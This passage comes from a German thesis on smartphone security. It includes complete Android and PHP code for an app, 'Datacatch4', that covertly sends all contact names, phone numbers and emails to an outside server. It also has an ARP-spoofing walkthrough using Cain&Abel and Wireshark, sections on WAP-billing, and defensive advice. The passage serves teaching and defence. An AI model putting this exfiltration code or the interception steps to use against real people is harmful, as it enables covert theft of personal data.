6.2.2.2 Android Manifest
Im Android-Projekt „Datacatch4“ ist eine Datei mit dem Beschriftung AndroidManifest.xml enthalten. In dieser Datei werden die Permissions (Zugriffserlaubnisse) implementiert, d. h. hier wird festgelegt, dass die App später bei der Installation den Anwender um Erlaubnis fragen wird, damit es auf die Netzwerkkommunikation und das Kontaktverzeichnis zugreifen darf. Der Anwender kann diese Zugriffe ablehnen, was zur Folge hat, dass die App nicht installiert wird.
<uses-permission
android:name=„android.permission.INTERNET“ />
<uses-permission android:name=„android.permission.ACCESS_NETWORK_STATE“ />
<uses-permission
android:name=„android.permission.READ_CONTACTS“ />
6.2.2.3 Mainactivity
In dem Package src/com.example.Datacatch4 liegt das Hauptdokument die Mainactivity.java. Da nun das Layout erstellt und die Zugriffe implementiert sind, wird hier alles Verknüpft. Anhand des Quellcodes wird nun auf die Funktionsweise der App eingegangen:
Es wurden einige Klassen importiert. Diese sind notwendig, um bestimmte Funktionen nutzen zu können. Diese lassen sich automatisch in Eclipse generieren.
In der MainActivity wurden fünf Variablen deklariert:
TextView tvIsConnected; String name; String phoneNo; String value; String email;
6.2.2.4 Internetverbindung
Durch die Implementierung des folgenden Codes wird nun angezeigt, ob das mobile Endgerät eine bestehende Internetverbindung hat oder nicht. Bei bestehender Internetverbindung wird in einem grünen Feld der Text „Verbunden“ angezeigt. Bei nicht bestehender Internetverbindung wird ein rot markiertes Feld mit dem Text „Keine Verbindung“ angezeigt. Für die If-Abfrage wird die Methode isConnected() aufgerufen.
tvIsConnected = (TextView) findViewById(R.id.tvIsConnected);
if(isConnected()){
tvIsConnected.setBackgroundColor(0xFF00CC00);
tvIsConnected.setText(„Verbunden“);
}
else{
tvIsConnected.setText(„Keine Verbindung!“);
}
Die Internetverbindung wird durch die Methode isConnected() geprüft, welches mit dem Datentyp boolean deklariert wurde. Wenn die Internetverbindung besteht, wird „true“ (Verbindung besteht) zurückgegeben, ansonsten wird der Wert „false“ als Rückgabewert übermittelt.
public boolean isConnected(){
ConnectivityManager connMgr = (ConnectivityManager)
getSystemService(Activity.CONNECTIVITY_SERVICE);
NetworkInfo networkInfo = connMgr.getActiveNetworkInfo();
if (networkInfo != null && networkInfo.isConnected())
return true;
else
return false;
}
6.2.2.5 AsyncTask
AsyncTask ermöglicht die korrekte und einfache Nutzung des UI-Thread. Diese Klasse ermöglicht Operationen im Hintergrund auszuführen, und die Ergebnisse auf dem UI-Thread zu veröffentlichen, ohne die Threads und/oder Handler manipulieren zu müssen.50 D. h. der erwünschte Prozess, welches auf die Kontaktdaten zugreift und an den Server sendet, muss in einem Nebenthread erfolgen, und darf den Hauptthread nicht beeinträchtigen, da sonst die App abstürzen wird.
class MyAsyncTask extends AsyncTask<String, Integer, Double>{}
6.2.2.6 Do In Background
Bei der Verwendung eines AsyncTask, wird doInBackground(Params…) verwendet, um länger dauernde Hintergrundberechnungen durchzuführen. Die Methode wird überschrieben und die Parameter (in dem Fall ein String) des MyAsyncTask werden übernommen.51
@Override
protected Double doInBackground(String… params) {
// TODO Auto-generated method stub
postData(params[0]);
return null;
}
Nun wird die Methode postData() programmiert. Durch einen Http-Client wird der Datenstrom an das PHP-Skript auf dem Server (Url: http://hsnr.ahisi001.bplaced.net/server.php) übergeben.
public void postData(String WertDenIchSendenMöchte) {
HttpClient httpclient = new DefaultHttpClient();
HttpPost httppost = new
HttpPost(„http://hsnr.ahisi001.bplaced.net/server.php“);
//–message2 ist die Variable, welches vom PHP-Skript empfangen wird–
List<NameValuePair> nameValuePairs = new ArrayList<NameValuePair>(2);
nameValuePairs.add(new BasicNameValuePair(„message2“, WertDenIchSendenMöchte));
try {
httppost.setEntity(new UrlEncodedFormEntity(nameValuePairs));
} catch (UnsupportedEncodingException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
try {
httpclient.execute(httppost);
} catch (ClientProtocolException e) {
// TODO Auto-generated catch block
e.printStackTrace();
} catch (IOException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}}}
6.2.2.7 Datenbankabfrage
Im folgenden Abschnitt wird nun auf die Kontaktliste zugegriffen. Die Informationen werden herausgelesen, geordnet und zuletzt an die vorher beschriebene MyAsynkTask-Methode als String übergeben. Die Klasse ContentResolver ermöglicht die Verwaltung und Veröffentlichung von persistenten Daten, mit einer Anwendung zu verknüpfen.52 Für ein Lese- und Schreibzugriff auf die Ergebnismenge einer Datenbankabfrage wird die Klasse Cursor verwendet53. Um auf die Tabelle des Android Geräts zuzugreifen, auf der die Kontaktdaten angelegt sind, wird eine query-Abfrage durchgeführt. Eine Zeile in der Contacts.Contract.Contacts Tabelle steht für ein Aggregat aus einem oder mehreren Daten, die vermutlich dieselbe Person beschreiben.54
Da die Kontakte einzeln ausgelesen werden sollen, erfolgt die Abfrage durch das CONTENT_URI Befehl55.
ContentResolver cr = getContentResolver();
Cursor cur = cr.query(ContactsContract.Contacts.CONTENT_URI, null, null, null, null);
if (cur.getCount() > 0) {
while (cur.moveToNext()) {
Es wird ein Kontakt ausgewählt und seine ID-Nummer wird ausgelesen:
String id =
cur.getString(cur.getColumnIndex(ContactsContract.Contacts._ID));
Da der Cursor momentan noch auf dieselbe Person wie bei der ID zeigt, wird der Name ausgelesen und in der Variable name übergeben:
name = cur.getString(cur.getColumnIndex(ContactsContract.Contacts.DISPLAY_NAME));
Hier wird ein neuer Cursor gesetzt, da die Telefonnummer unter CommonDataKinds zufinden ist. Anhand der ID wird nach dem Kontakt gesucht und dessen Telefonnummer ausgelesen. Die Telefonnummer wird der Variablen phoneNo übergeben.
Cursor phones = cr.query(ContactsContract.CommonDataKinds.Phone.CONTENT_URI,null, ContactsContract.CommonDataKinds.Phone.CONTACT_ID+ “ = ?“, new String[]{id}, null);
while(phones.moveToNext()){
phoneNo = phones.getString(phones.getColumnIndex(ContactsContract.CommonDataKinds.Phone.NUMBER));
}
Hier wird wieder ein neuer Cursor gesetzt, da die Email-Adresse ebenfalls unter CommonDataKinds zufinden ist, und um den Code in verständliche einzelne Teilabschnitte zu zerlegen. Anhand der ID wird nach dem Kontakt gesucht und dessen Email-Adresse ausgelesen. Die Telefonnummer wird der Variablen email übergeben.
Cursor emailCur = cr.query(ContactsContract.CommonDataKinds.Email.CONTENT_URI, null, ContactsContract.CommonDataKinds.Email.CONTACT_ID + “ = ?“, new String[]{id}, null);
while (emailCur.moveToNext()) {
email = emailCur.getString(emailCur.getColumnIndex(ContactsContract.CommonDataKinds.Email.DATA));
}
emailCur.close();
phones.close();
Nachdem nun die erwünschten Variablen (Name, Telefonnummer und Email-Adresse) ausgelesen und den Variablen übergeben wurden, wird die MyAsyncTask Methode aufgerufen und die Werte werden in geordneter Reihenfolge übergeben.
new MyAsyncTask().execute(name + „,“ + phoneNo + „,“ + email);
6.2.2.8 Server
Der hier verwendete PHP-Skript unterscheidet sich nicht von dem der im vorherigen Fallbeispiel verwendeten PHP-Datei. Es wurden lediglich einige Anpassungen durchgeführt.
<?php
// Empfängt die variable „message“ von der App.
$message=$_POST[„message2“];
//Erstellt eine CSV-Datei falls keiner vorhanden ist. Ansonsten werden die //empfangenen Daten an das Ende der bereits bestehenden CSV-Datei angehängt.
$daten = array($message);
$fp = fopen(‚datacatch.csv‘, ‚a‘);
fputcsv($fp, $daten);
fclose($fp); ?>
Zuletzt wird die datacatch.php mittels FileZilla auf den Server übertragen. Das Client-Server Modell wurde somit aufgebaut und ist betriebsbereit.
6.3 Testablauf
Zur Darstellung des Fallbeispiels wurde ein Android Virtual Device Emulator mit fiktionalen Charakteren und erfundenen personenbezogenen Daten verwendet.
1. Schritt: Kontakte werden angelegt.
Im Kontaktverzeichnis des mobilen Endgeräts werden zwei Kontakte mit folgenden Daten angelegt:
Name: Max Mustermann; Tel: 222222; Email: max@hsnr.de.
Name: Alice Wunderland; Tel: 333444; Email: alice@hsnr.de.
Abb. 12: Kontaktdaten56
2. Schritt: App wird gestartet.
Die App wird gestartet. Der Prozess im Vordergrund zeigt die bestehende Internetverbindung und die Aufschrift „Hello World“ (s. Abb. 11).
Sobald die App gestartet wurde übermittelt der (in den vorherigen Abschnitten erläuterte) im Hintergrund laufende Prozess die Kontaktdaten an den Server.
Abb. 13: Datacatch457
3. Schritt: Daten.csv wird heruntergeladen und in Excel geöffnet.
Der Angreifer ruft die Server-Internetadresse mit einem Webbrowser auf und kann die dort abgespeicherte CSV-Datei herunterladen. Die Datei ist in demselben Verzeichnis hinterlegt auf dem auch das PHP-Skript importiert wurde.
Abb. 14: Excel-Tabelle58
Nachdem die Datei mit der Excel-Software geöffnet wurde, können unter dem Menüpunkt Daten>Text in Spalten die Informationen in separate Spalten aufgeteilt werden.
Wie aus den letzten drei Abbildungen zusehen ist, ist es gelungen durch das Starten der App Datacatch4, die Kontaktdaten auf dem Server als CSV-Datei abzuspeichern und im Nachhinein einzusehen.
7 Hotspot
Öffentliche drahtlose Netzwerke gewinnen zureichend an Beliebtheit und sind in Restaurants, Flughäfen, Hochschulen und vielen weiteren Lebensbereichen anzutreffen. Die Kommunikations-Schnittstellen WLAN und Bluetooth ermöglichen es, sich schnell und unkompliziert mit dem Internet zu verbinden und das auch noch ohne ersichtliche Kosten. In dem nächsten Kapitel, werden diese drahtlosen Kommunikationsstandards behandelt. Zunächst wird Bezug auf technische Grundlagen von Netzwerkprotokellen und Netzwerktopologien genommen. Danach werden die Sicherheitsaspekte erörtert und mit dem Softwareprogramm Wireshark ein kurzes Beispiel demonstriert, wie Angreifer möglicherweise Daten ausspionieren können.
7.1 OSI-Referenzmodell
Das OSI-Referenzmodell bildet mit seinen sieben Schichten die Grundlage für die Netzwerke, wobei jede Schicht der ihr darüber liegenden Schicht, Dienste zur Verfügung stellt. Somit wird die komplexe Aufgabe in übersichtliche weitgehend eigenständige Teilaufgaben zerlegt. Für jede Schicht gibt es mehrere Protokollspezifikationen für verschieden Protokolle.59
7- Verarbeitungs-/Anwendungsschicht: Enthält Protokolle, die eine gewisse Anwendungsfunktionalität bereitstellen (z. B. Http). Im Gegensatz zu den anderen Schichten stellt dieser keinen generellen schichtspezifischen Dienst bereit.60
6- Darstellungsschicht: Die Darstellungsschicht setzt die systemabhängige Darstellung der Daten in eine systemunabhängige und vereinbarte Form um, und ermöglicht somit eine einheitliche Transfersyntax. Datenkompression und Datenverschlüsselung sind ebenfalls in dieser Schicht enthalten.61
5- Sitzungsschicht: Diese Schicht stellt „(…) eine Sitzung (Session) zwischen zwei Kommunikationsprozessen her und regelt den Dialogablauf der Kommunikation“62.
4- Transportschicht: Die Transportschicht stellt eine Ende-zu-Ende-Beziehung zwischen Empfänger und Sender zur Verfügung.63
3- Netzwerk- oder Vermittlungsschicht: Auf- und Abbau der Verbindungen. Adressierung aller Datenpakete mit der Quell- und Ziel-Adresse (Routing).64
2- Sicherungsschicht: „Steuerung von Dateneinheiten auf Vermittlungs-abschnitten zwischen Knoten; Fehlererkennung und –korrektur“, d. h. gesicherte Übertragung von Daten.65
1- Bitübertragungsschicht: Diese Schicht stellt eine physikalische Verbindung bereit. Sie wandelt Datenströme in elektrische Signale um und ist für den physikalischen Transport der Daten zuständig.66
7.2 WLAN
WLAN ist eine Abkürzung für Wireless Local Area Network und ermöglicht durch Frequenzwellen zwischen 300 MHz und 5 GHz eine drahtlose Verbindung der IT-Geräte untereinander, oder auch ins World Wide Web. Die IEEE (weltweiter Berufsverband von Ingenieuren) definierte die 802.11 Standards.67 Mit dem WLAN werden auf Schicht 3 des OSI Referenzmodells IP-Pakete transportiert, der Data Link Layer (Schicht 2) wurde mit wenigen Veränderung von dem Kabelgebundenen Referenzmodell übernommen und die Schicht 1 wurde vollständig neuentwickelt (s. Abb. 13).68 Das mobile Endgerät sucht alle Frequenzen ab und zeigt die empfangbaren zugänglichen SSID`s an. Sobald einmal die Verbindung aufgebaut wurde, merkt sich das Endgerät die SSID und verbindet sich (wenn die WLAN-Funktion eingeschaltet ist) automatisch mit der Station, sobald dieser in Empfangsnähe ist. Durch Kryptographische Verschlüsselungsverfahren (wie die WEP-Verschlüsselung) werden WLAN-Netzwerke sicherer. In den öffentlichen Netzwerken werden solche Sicherheitsverfahren aber selten durchgeführt.
Abb. 15: WLAN-Protokollstack69
7.2.1 Ad-hoc-Modus
Im Ad-hoc-Modus “…kommunizieren zwei oder mehr WLAN-Geräte direkt miteinander..“70, d. h. ein Endgerät kann direkt und gleichberechtig zu einem anderen Endgerät Daten versenden, empfangen und austauschen.71 Durch die Aktivierung des Ad-hoc-Modus auf allen Stationen und die Selektion eines gemeinsamen Übertragungskanals, kann das WLAN innerhalb desselben Gebäudes eine Reichweite zwischen 30 m und 50 m erreichen.72
7.2.2 Access Points
Da Anwender mobiler Endgeräte Zugang ins Internet benötigen, kann dies durch sogenannte Access Points geschaffen werden. Der Access Point verbindet den Übergang der drahtlosen Verbindung des mobilen Endgeräts mit einer drahtgebundenen Verbindung (LAN). Das mobile Endgerät sendet das Datenpaket zunächst an den Access Point, welches die Zieladresse analysiert und das Datenpaket weiterleitet.73 In der Regel sind heutzutage Access Points in die DSL-Router integriert und in den meisten privaten Haushalten anzutreffen. „Hotspots repräsentieren öffentlich nutzbare Funkbereiche, die durch entsprechen ausgestattete Access Points der Allgemeinheit oder bestimmten zugelassenen Gruppen zur Verfügung gestellt werden.“74
7.2.3 WPA 2
Access Points können durch Verschlüsselungsmaßnahmen sicherer konfiguriert werden.
Wireless Protected Access 2 ist ein Sicherheitsstandard für drahtlose Netzwerke. Es wird dasselbe Passwort sowohl im Access Point als auch im Endgerät hinterlegt, das Passwort wird als Pre-shared Key bezeichnet. Somit authentifiziert sich das Endgerät gegenüber dem Access Point und umgekehrt.75
„Außerdem einigen sich Endgeräte und Access Point während dieses Prozesses auf ein gemeinsames Schlüsselpaar für die Chiffrierung der Nutzdaten, die Session Keys. Dieses verwendet dann die Zufallszahl und das gemeinsame Passwort (Pre-Shared Key), um eine Antwort zu generieren. Das Passwort hat eine Länge von 8 bis 64 Zeichen. Der Access Point vergleicht im nächsten Schritt die Antwort mit der zuvor selber berechneten Antwort.“76
Wenn die Passwörter übereinstimmen wird der neugenerierte Session Key an das Endgerät versendet, welches der Access Point gemeinsam mit dem Passwort vorher verschlüsselt. Das Endgerät entschlüsselt den Session Key und bestätigt dem Access Point den korrekten Empfang. Zuletzt teilt der Access Point dem Endgerät „den Schlüssel für die Dechiffrierung von Broadcast Frames mit.“77 WPA 2 nutzt die AES (Advanced Encryption Standard) – Verschlüsselung.
Die Zufällige Datenmanipulation (z. B. durch Störeinflüsse) wird durch den Kanalcodiere erkannt und ggf. korrigiert. Um mutwillige Datenmanipulation zu verhindern wird ein Verschlüsselungsalgorithmus verwendet.78
7.2.4 Daten Spionage
Bei der Nutzung eines Hotspots besteht die Gefahr, dass dritten die Möglichkeit geboten wird, übersendete Datenpakete mit zu lesen und ggf. zu manipulieren. Diese Art von Angriff wird als Man-in-the-Middle (kurz Mitm) bezeichnet. Bei solch einem Angriff schleicht sich der Angreifer zwischen die Kommunikationspartner, ohne dass diese es merken.79
Um aufzuzeigen, wie so ein Vorgang durchgeführt wird, wurde auch hierzu ein Test durchgeführt. Die Nutzung des WLAN wird, wie im Unterkapitel WLAN beschrieben, nachdem Verfahren des OSI-Referenzmodells abgehalten. Bei einer Kommunikation werden somit Protokolle erstellt. Protokolle sind eine „Menge von Vereinbarungen, mit denen eine Kommunikation ausgeführt wird“80.
Abb. 16 Man-in-the-Middle81
7.2.4.1 Adressen & Spoofing
Das Wort „Spoofing“ stammt aus dem englischen und bedeutet „Manipulation“, „Verschleierung“ und „Täuschung“. Bei Mitm-Angriffen fällt dieser Begriff sehr oft und wird mit anderen Begriffen kombiniert eingesetzt. Die Kommunikation der IT-Geräte mit dem Internet verläuft organisiert, wie im vorherigen Kapitel zu sehen ist.
MAC-Adresse: Medium Access Control (MAC). Jedem Datenpaket wird eine MAC-Header vorangestellt, der u. a. die Adresse des Senders und Empfängers (MAC-Adressen) enthält.82 Die MAC-Adresse ist die einzigartige Hardwareadresse jedes Netzwerkadapters und ermöglicht dadurch, jedes Gerät eindeutig zu identifizieren.83 Die MAC-Schicht „(..) regelt den Zugriff der Engeräte auf das Übertragungsmedium“.84
IP-Adresse: Bei den TCP/IP- Protokollen verläuft die Authentisierung der IT-Geräte im Netzwerk über die IP-Adresse. Wenn beispielsweise sich ein mobiles Endgerät sich mit dem WLAN verbindet, so erhält es eine IP-Adresse. Der Router selber hat ebenfalls eine IP-Adresse.
Um eine Mitm-Angriff auszuführen, gibt es unterschiedliche Möglichkeiten. Durch IP-Adressen, MAC-Adressen oder Adress Resolution Protokoll- Spoofing gelingt es Angreifer Daten auszuspionieren.
7.2.4.2 Angriffszenario
Der Test wurde mittels eines Notebooks und eines Smartphones (Samsung Galaxy S5) durchgeführt, welche über WLAN kommunizieren. Beide befinden sich in demselben WEP2-Verschlüsselten WLAN-Netz.
Es wurde zunächst die kostenlose Software Wireshark heruntergeladen und installiert. Wireshark ist ein Softwareprogramm, das alle Aktivitäten in Echtzeit protokolliert, die im Netzwerk stattfinden. So kann über ein fremdes Notebook der ganze Datenverkehr (Passwörter, PIN-Nummern etc.), der im selben Netzwerk verbundenen Hardwaregeräte, dokumentiert und mitgelesen werden. Es werden nicht nur die Aktivitäten protokolliert, die das Netzwerk drahtlos verwenden, sondern auch die LAN-gebundenen Hardwaregeräte können ggf. erkannt und erfasst werden.
Als nächstes wird das kostenlose Software-Tool Cain&Abel heruntergeladen und installiert. Cain&Abel ist eine Software mit der ein Angreifer sich zwischen zwei Kommunikationspartner einschleichen kann.
Zunächst wird das WLAN-Netzwerk gescannt und anschließend listet das Programm alle sich im Netz befindenden IT-Geräte auf. Wie in der Abbildung zu sehen ist (s. Abb. 15), wurden in diesem Szenario mehrere Geräte angezeigt, so auch der DSL-Router und das Smartphone Samsung Galaxy S5.
Abb. 17 Cain&Abel85
Im weiteren Verlauf werden die beiden Geräte ausgewählt, die der Angreifer belauschen möchte. In der vorherigen Abbildung konnte angesehen werden, welches Gerät welche IP-Adresse und MAC-Adresse besitzt. In der linken Spalte wird nun die IP-Adresse des Smartphones ausgewählt und rechts die des DSL-Routers, d. h. es soll das linke Gerät in seiner Kommunikation mit dem rechten belauscht werden.
Abb. 18 ARP Poison Routing86
Nachdem nun das Clain&Abel Softwareprogramm konfiguriert wurde, wird das Softwareprogramm Wireshark gestartet und die Aufzeichnung der Protokolle wird gestartet.
Über den herkömmlichen Webbrowser Google Chrome wird dann die erstellte HSNR Phishing-Internetseite (s. Kapitel Phishing) mit dem Smartphone aufgerufen. Im Anmelde-Portal wird als Benutzerkennung der Benutzername „Mamus001“ und das Passwort „12345“ eingegeben. Danach wird die Aufzeichnung im Wireshark Programm beendet. Nun können alle Protokolle (TCP, SSL, HTTP etc.) des Datenverkehrs eingesehen werden. Durch die Suchfunktion wird die Ergebnismenge eingegrenzt und das richtige Http-Protokoll wird rausgesucht. Wie in der Abbildung Http-Protokoll zu sehen ist, werden Benutzername und Passwort angezeigt. So ist es Angreifern auch möglich andere private Daten mitzulesen, welches die Nutzer des öffentlichen Netzwerkes versenden.
Abb. 19 Http-Protokoll87
7.3 Bluetooth
Ein weiterer Kommunikationsstandard in der drahtlosen Kommunikation ist die seit 1998 von der Bluetooth Special Interest Group (SIG) entwickelte Bluetooth-Technologie. Ziel war es damals eine kleine, kostengünstige, energiesparsame Funkschnittstelle mit geringer Reichweite zu entwickeln. Zu den technischen Grundlagen gehören die Protokolle und Systemtopologien. Die drahtlose Verbindung im Netzwerk wird durch Frequenzwellen zwischen 2.400 und 2.480 MHz ermöglicht. Dieses Netzwerk nennt sich Piconet und wird durch die beteiligten Geräte selbst aufgebaut. Es können theoretisch bis zu 255 Geräte in einem solchen Netz zusammengeschlossen werden, wobei nur acht gleichzeitig aktiv sein können.88 „Jedes Bluetooth-Gerät besitzt eine Device Address (Geräteadresse) von 48 bits Länge. Ein Bluetooth-Gerät polled seine Umgebung (Inquiry) ständig, ob sich innerhalb seiner Reichweite ein anderes Bluetooth-Gerät befindet, das kommunizieren möchte.“89 Sobald mit einem anderen Gerät kommuniziert werden soll, wird eine Paging-Aufforderung initialisiert, wobei das Paging-Gerät als Master fungiert und seine Adresse bekannt gibt (die Rolle des Bluetooth-Geräts wird als Slave bezeichnet). Es können Punkt-zu-Punkt-Verbindungen, aber auch 1-zu-n-Verbindungen aufgebaut werden.90
Unter dem Menüpunkt Mobile Hotspot und Tethering, kann der Mobile Hotspot ein- und ausgeschaltet werden. Es erlaubt dem Anwender sein Android Gerät als Internet-Zugangspunkt zu verwenden. So können sich bis zu 10 andere Geräte über WLAN verbinden. Die verbundenen Geräte können dann über das mobile Netz des Android-Geräts auf das Internet zugreifen. Zusätzlich kann ein Profil zugelassener Geräte erstellt werden.
Bluetooth bietet unterschiedliche Sicherheitsbetriebsarten an:
- „Modus 1 (non secure): keine speziellen Sicherheitsmaßnahmen, keine Authentifizierung erforderlich.
- Modus 2 (Service Level Security): Sicherheitsmechanismen auf Dienstebene.
- Modus 3 (Link Level Security): Sicherheitsmechanismen auf der Verbindungsebene – kryptografisch (Authentisierung) und/oder Datenverschlüsselung.“91
8 WAP-Billing
„WAP ist ein Übertragungsstandard, der es ermöglicht, mit mobilen Endgeräten, wie Handys, auf Dienstleistungen und Anwendungen zuzugreifen. Eine dieser Anwendungen ist das Aufrufen von Websites, die extra für diesen Zweck erstellt wurden.“92 WAP-Billing93 ist die Zusammensetzung des Wortes „WAP“ (Wireless Application Protocol)94 und dem englischen Wort „Billing“ (Abrechnung).
Mobile Endgeräte, wie Smartphones oder Tablet-PCs, ermöglichen durch Webbrowser den Zugang ins Internet. Der Unterschied beim Surfen mit einem Smartphone im Internet, liegt im Gegensatz zu einem Notebook daran, dass dieses über eine Telefonnummer verfügt und einen Internet-/Mobilfunkanbieter als Voraussetzung benötigt. Aktuell zeigt sich eine neue Methode der Cyber-Kriminalität dadurch, dass Internetseiten oder Werbebanner von Apps speziell für mobile Endgeräte, mit einem Mobilfunkanbieter manipuliert werden.
Sobald der Anwender eines dieser manipulierten Internetseiten aufruft, öffnet sich ein Pop-up-Fenster mit einer inhaltlich falschen Aussage, welche der Anwender auch nicht durch ein Button schließen kann, sondern meistens nur mit einem „ok“-Button bestätigen muss (s. Abb. 17).
Abb. 20 WAP-Billing95
Durch die Bestätigung werden dann eine Reihe von Prozeduren angestoßen. Der Anwender schließt ohne sein Wissen oder Einverständniserklärung ein zunächst verbindliches Abo ab, und erhält binnen weniger Minuten eine Bestätigungs-SMS. Die anfallenden Kosten bzw. Abo-Beträge werden über den Mobilfunkanbieter eingeholt bzw. abgerechnet. Gleiches Prinzip wird an den Werbebannern einiger Apps angewandt.
9 Gegenmaßnahmen
Nachdem die Gefahren aufgelistet und ausführlich ausgearbeitet sind, werden im folgenden Kapitel Sicherheitsmaßnahmen aufgezählt, welche die Anwender der mobilen Endgeräte beachten sollten, um Angriffen vorzubeugen oder ggf. den entstandenen Schaden auf ein tragbares Maß zu reduzieren. Hierzu entstehen zwei Perspektiven. Zum einen gibt es Sicherheitsvorkehrungen und –bestimmungen, welches die Dienstanbieter erfüllen müssen, und zum anderen, die Perspektive in der die Verantwortungen dem Anwender auferlegt werden. Das Cobit-Framework, der IT-Grundschutzkatalog und weitere Dokumente zeigen Richtlinien der IT-Sicherheit an.
9.1 Einstellungen, Zugriffe & Dienste
Apps aus unbekannten Quellen zu installieren sollte vermieden werden. Zusätzlich den Menüpunkt „unbekannte Quellen“ unter den Einstellungen des Anroid-Geräts deaktivieren und deaktiviert lassen.
Bei der Installation einer App aus dem Google Playstore, fragt jede App den Anwender nach Erlaubnis auf Zugriffe bestimmter Funktionen und Daten auf dem Endgerät. Apps die Zugriffe auf das Kontaktverzeichnis oder Email-Verzeichnis fordern, sollte der Zugriff untersagt werden. Wie im Kapitel Schadsoftware erkennbar ist, sind Daten durch im Hintergrund ablaufende Prozesse abgreifbar. Hier werden außerdem die Daten unbeteiligter Dritter weitergegeben, was zufolge hat, dass auch jedes Android-Gerät, der die eigenen Daten enthält (z. B. Kontaktliste von Freunden und Familienangehörigen) eine Gefahr darstellt.
Weiterhin sollte darauf geachtet werden, dass der WLAN-Modus abgeschaltet ist, da sich das mobile Endgerät sonst automatisch (bei bereits registrierten Access Points) verbindet.
Um sich gegen Viren, Trojaner und Malware zu schützen und Unbefugten den Zugriff auf private Daten zu verhindern, wurden kostenfreie und kommerzielle Apps entwickelt, die im Google Playstore zu erwerben sind. Auch spezielle Schutzsoftware-Webbrowser wurden entwickelt, die durch integrierte Sicherheitsmechanismen, wie Warnungen, sicheres Browsen oder Zugriffsverwaltung, den Anwender unterstützen (es wurde zu Untersuchungszwecken die App „CM SecurityAntivirus Applock“ installiert und verwendet). Adblock Browser schützen vor unerwünschten Pop-up Fenstern und beugen somit Gefahren wie dem WAP-Billing nur teilweise vor.
Weiterhin ist eine Datensicherung vorteilhaft und sollte zwischendurch durchgeführt werden, damit ggf. das Endgerät zurückgesetzt bzw. die Software neuinstalliert werden kann.
9.2 Drittanbietersperre
Es ist darauf zu achten, dass beim surfen mit mobilen Endgeräten stets die Gefahr des WAP-Billing besteht, deswegen sollte insbesondere bei geschäftlichen Smartphones und Tablet-PCs vermieden werden, unbekannte Seiten aufzurufen.
Um sich gegen WAP-Billing zu schützen, sollte eine Drittanbietersperre über den Mobilfunkanbieter gesetzt werden. Dadurch kann Abo-Fallen vorgebeugt werden, da die Abrechnung nicht mehr automatisch über den Mobilfunkanbieter vorgenommen werden kann.
Sollte sich beim Surfen im Internet ein Pop-up Fenster öffnen oder der Anwender plötzlich auf eine andere Seite weitergeleitet werden, so sollte der Anwender als erstes den Flugmodus einschalten. Nachdem der Datenverkehr durch den Flugmodus angehalten wurde, wird der Browser geschlossen und beim öffnen müssen nur noch die Internetseiten (Tabs) geschlossen werden.
Sollte bereits der Fall eingetreten sein, dass der Prozess des WAP-Billing durchgeführt wurde, sollte schnellstmöglich über der in der SMS/Email angegebenen Kontaktanschrift der Vertrag gekündigt werden, um weiteren Schaden zu vermeiden. Um die Kosten wieder einzuholen, kann der Mobilfunkanbieter kontaktiert werden oder das Cyberkriminelle Unternehmen.
9.3 Überprüfung der Authentizität
Emails mit der Aufforderung, persönliche Daten wie Passwörter und TAN-Nummern zu bestätigen, müssen abgelöscht werden. Ggf. kann hier das Unternehmen oder die Behörde unter der offiziellen Rufnummer oder Email-Adresse kontaktiert werden, um die Authentizität/Verbindlichkeit und Wahrheitsaussage (Integrität) der empfangenen Nachricht zu hinterfragen.
Um Social Engineering Gefahren auszuweichen, sollte immer der offizielle Weg bei einem Sachverhalt beschritten werden. Insbesondere bei der Kommunikation über das Telefon, sollte aufgelegt und nochmal unter der offiziellen Telefonnummer zurückgerufen werden, um auch hier die Authentizität/Verbindlichkeit und Integrität zu wahren. Wenn beispielweise, wie im Kapitel Social Engineering beschrieben, eine unbekannte Person über das Telefon anruft und sich als Techniker einer Sicherheitsfirma ausgibt, so muss aufgelegt, und unter der offiziellen Rufnummer die Sicherheitsfirma zurückgerufen werden.
9.4 Sichere Nutzung von Hotspotnetzwerken
Die meisten Hotspots bieten „(…) ihre Dienste in Form von Shared-Networks (…)“96 an. „Dadurch kann im Allgemeinen der Zugriff von jedem Endgerät auf jedes andere teilnehmende Endgerät möglich sein.“97
Das Bundesamt für Sicherheit in der Informationstechnik hat im IT-Grundschutzkatalog aufgeführt, wie der sichere Betrieb von Hotspots erfolgen soll. Hier werden u. a. WLAN-Spezifische Maßnahmen, Webauthentisierungen, kryptographische Verfahren etc. detailliert beschrieben. So wird auch beispielweise aufgelistet, dass Access Points, welche als Hotspots fungieren, niemals direkt mit dem LAN verbunden werden dürfen, sondern über sogenannte Sicherheitsgateways (Firewall) verbunden werden müssen.98
Anwender sollten Private Daten (z. B. Passwörter, PIN-Nummern, TAN-Nummern etc.) nicht auf Internetseiten eingeben oder als Nachricht versenden, wenn sie öffentliche Hotspotnetzwerke verwenden.
Einige Hotspot-Anbieter (z. B. Telekom) oder App-Entwickler im Google Playstore bieten für einen sicheren Datenverkehr sogenannte VPN-Clients an. Durch die VPN-Client-Software für Notebooks kann die Datenübertragung Verschlüsselt werden, sodass sie nicht mehr abgehört werden kann.99 Für Android Geräte gibt’s es VPN-Client App Anbieter, die das kommunizieren sicherere stellen sollen.
Obwohl in den meisten Geräten Sicherheitsmechanismen eingebaut sind, werden aus Bequemlichkeit, Misstrauen oder Kompatibilitätsgründen, wie beispielweise Verschlüsselungsfunktionen des WLANs von den Anbietern der Hotspotnetzwerke nicht genutzt. Deshalb sollte das Sicherheitsniveau, die Vertrauenswürdigkeit und die Abspeicherung personenbezogener Daten immer hinterfragt werden. Die Passwörter sollten komplex gestaltet und nach einiger Zeit geändert werden. Wie aber aus dem Angriffszenario im Kapitel Hotspot zu erkennen ist, sollte ein Man-in-the-Middle-Angriff niemals ausgeschlossen werden.
Firewall
„Eine Firewall ist ein Hard- oder Softwaresystem, das die Verbindung zwischen Netzen kontrolliert und insbesondere Angriffe aus dem Internet auf das eigene Netz (Intranet) abwehrt. Das Spektrum beginnt bei einfachen, z. T. kostenlosen Computerprogrammen („Personal Firewall“), die meist nur den Rechner schützen, auf dem sie installiert sind. In großen Netzen werden dagegen komplexe Firewallsysteme eingesetzt, die aus mehreren Hard- und Softwarekomponenten bestehen.“
Firewalls sind ein Sicherheitsmechanismus für mobile Endgeräte wie Notebooks. Doch auch für Smartphones oder Tablet-PCs gibt es Firewall Apps die dem Anwender ermöglichen die Kontrolle zu behalten. Durch die Firewall App können gezielt den Anwendungen der Zugriff auf das Internet verweigert werden. Es ist lediglich darauf zu achten, dass bei der Installation keine Root Rechte genehmigt werden (sollten).
10 Zusammenfassung und Ausblick
